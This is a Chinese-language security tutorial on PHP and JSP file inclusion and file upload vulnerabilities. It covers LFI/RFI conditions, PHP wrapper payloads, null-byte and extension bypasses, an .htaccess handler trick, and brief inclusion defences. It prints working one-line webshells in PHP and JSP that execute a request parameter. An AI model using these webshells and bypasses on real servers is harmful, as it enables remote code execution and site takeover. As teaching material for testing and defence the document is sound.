PHP -- 文件包含、文件上传漏洞

文件包含

文件包含漏洞

文件引入漏洞，是由一个动态页面编译时引入另一个文件的操作。

文件引入本身是没有问题，它是用于统一页面风格，减少代码冗余的一种技术。但是在特定的场景下就会形成漏洞

jsp：include指令和include动作，其中include动作用于引入动态文件

php：include()，include_once()，require()，require_once() 函数

require() 如果在包含的过程中有错，比如文件不存在，则直接退出

include()如果在包含的过程中有错，只会给出警告，继续执行

require_once()功能同require()；include_once()功能同include。如果文件已经被包含了一次，那么_once函数就不会在去包含了
为什么PHP的文件包含比JSP的文件引入漏洞更严重

JSP的include指令仅用于引入静态文件或页面，include动作可用于引入静态页面或动态页面。但是JSP在引入的时候严格限定了文件类型，当引入一个txt的时候，它就是一个文本文件被加载且读取

PHP利用四个函数进行包含时，不管文件是什么类型，都会直接作为PHP文件进行解析

文件包含漏洞条件

必须使用了引入的函数
引入文件的名字参数化并且参数是由用户构建的

本地文件包含 LFI条件

本地文件包含，能打开并包含本地文件的漏洞

php.ini —> allow_url_fopen=on

远程文件包含RFI条件

包含远程服务器上的文件

php.ini—>allow_url_fopen=on

php.ini—>allow_url_include=on

文件包含漏洞的几个思考

在JAVA容器中的文件包含

首先，大部分的程序员不太可能让include的参数动态；其次，大部分程序员在处理include引入时都以静态资源为主。所以在这个环境下使用文件包含漏洞的几率不大。但是，如果WEB-APP中存在文件上传漏洞，那么可以利用上传漏洞上传带有include的页面，又但是，有了上传漏洞不如直接上传文件扫描或者一句话木马。综上，在JAVA容器，JSP文件引入漏洞利用率不高

在PHP容器中的文件包含

服务器会默认对某些参数禁用，但文件包含的4个函数是PHP中常用到的，因此有很大可能在服务器上会开启这些配置。对于引入时动态参数的问题，会有一部分程序员可能这么做，因此在PHP上，文件包含有一定的利用率

PHP伪协议包含

php://input

allow_url_include=on

php://filter

allow_url_include=on

通过指定末尾的文件，可以读取经过base64编码后的文件原文

phar://

版本大于等于5.3.0

allow_url_include=on

读取压缩文件中的内容

zip://

版本大于等于5.3.0

allow_url_include=on

同phar://，使用zip协议需要约对路径，并且使用%23来分割压缩文件名和文件名

b.txt在a.zip里面时，需要包含b.txt则需要用到a.zip%23b.txt

data://

版本大于等于5.2

allow_url_include=on

allow_url_fopen=on

    data://text/plain,<?php phpinfo(); ?>

PHP包含的利用

PHP包含Session

Session包存在服务器，PHP的Session以文件形式存在服务器中，sess_[PHPSESSID]

PHP包含Web日志

MySQL日志

SSH日志

包含environ

包含fd

包含临时文件

包含上传文件

包含其它文件

JSP引入漏洞的利用

利用动作含动态引入WEBSHELL

利用指令引入数据库配置文件，通常为xml或者poperties文件后缀

利用指令引入Web.xml配置文件，这是一个系统工程的全局配置

利用指含引入框架的配置文件，如：spring\springMVC\myBatis等，其中Hibernate框架和MyBatis框架的配置文件包含数据库信息，甚至表信息及语句

理论上可以利用动作非同源引入其它文件，包含容器下其它工程的配置信息

绕过

路径：相对路径 …/…/xxx.php，绝对路径+相对路径 D:/php/…/xxx

编码：利用URL编码

后缀：？ %00 file=phpinfo.txt%00

协议：zip
解决

加强服务器配置安全性

有效过滤用户输入，如果一定要动态引入，则限定引入的范围和类型；甚至你可以做一个引入的列表，用户禁止直接输入文件名，只能以编号的形式进行传递，而程序需要判定编号范围，并引入适当的文件

文件上传漏洞

文件上传

比较常见一类漏洞，文件上传漏洞可以上传WebShell、PowerShell、BashShell

并非所有的文件上传功能都有漏洞，并非所有的文件上传漏洞都可以被利用

上传的文件能够被容器加载和编译

上传的文件能够被访问（直接、间接）

上传的文件不能被服务器压缩或者修改内容

WebShell

php、jsp、asp、aspx

一句话木马：

PHP

<?php
    $a=$_GET['command'];
    eval($a); //或者执行shell_exec
?>

JSP

<%
    String cmd = request.getParameter("command");
    Runtime.getRuntime().exec(cmd)
%>

上传可以上传一句话木马，也可以上传其它的WebShell然后使用菜刀或者冰蝎去连接

绕过限制

验证过程：

利用JS在前端进行的验证
服务器端检查文件后缀名
检查MIME类型
随机新建文件名和扩展名
上传路径是不可被加载解析的
修改文件内容
检查文件内容

绕过：

前端校验 — 直接篡改页面，把JS校验内容删除掉

文件后缀名 — 特殊文件后缀 PHP(phtml);或截断[\0] \t

MIME类型检查

JPEG .jpg .jpeg Content-Type:image/jpeg

TEXT .txt Content-Type:text/plain

网页 .html Content-Type:text/html

RTF .rtf Content-Type:application/rtf

抓包修该类型

常见绕过

利用大小写绕过

利用截断后缀绕过

​ — 找操作系统不能识别但程序会认为是字符串的字符

​ 1.php%00.jpg

​ 1.php/00.jpg

​ 1.php\0.jpg

​ 1.php[\0].jpg

​ 1.php\t.jpg

​ 1.php(0x00).jpg

​ 1.php

利用Windows解析漏洞

​ 1.php.

​ 1.php::$DATA

​ 1.php:1.jpg

利用Apache的解析漏洞

​ 1.php.xxx.abc

​ 上传.htaccess 内容包含 SetHandler application/x-httpd-php

<FilesMatch "filename">
SetHandler application/x-httpd-php
</FilesMatch>

利用不太常用的后缀，但服务器会识别的

​ jsp jspx

​ php php3 php5 phtml

利用请求头

​ Content-Type